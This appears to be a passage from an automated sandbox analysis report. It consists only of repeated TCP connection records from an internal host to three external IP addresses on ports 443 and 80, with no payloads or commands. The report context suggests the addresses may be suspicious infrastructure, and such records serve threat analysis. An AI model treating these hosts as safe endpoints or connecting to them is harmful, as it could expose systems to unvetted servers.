Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443

Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 152.231.102.107:443
Source: global traffic	TCP traffic: 152.231.102.107:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 152.231.102.107:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 152.231.102.107:443
Source: global traffic	TCP traffic: 152.231.102.107:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 152.231.102.107:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 152.231.102.107:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 152.231.102.107:443
Source: global traffic	TCP traffic: 152.231.102.107:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 152.231.102.107:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 152.231.102.107:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 152.231.102.107:443
Source: global traffic	TCP traffic: 152.231.102.107:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 152.231.102.107:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 152.231.102.107:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 152.231.102.107:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 152.231.102.107:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 152.231.102.107:443
Source: global traffic	TCP traffic: 152.231.102.107:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
Source: global traffic	TCP traffic: 152.231.102.107:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
Source: global traffic	TCP traffic: 152.231.102.107:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 152.231.102.107:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
Source: global traffic	TCP traffic: 152.231.102.107:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 152.231.102.107:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
Source: global traffic	TCP traffic: 152.231.102.107:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 152.231.102.107:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
Source: global traffic	TCP traffic: 152.231.102.107:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 152.231.102.107:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
Source: global traffic	TCP traffic: 152.231.102.107:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
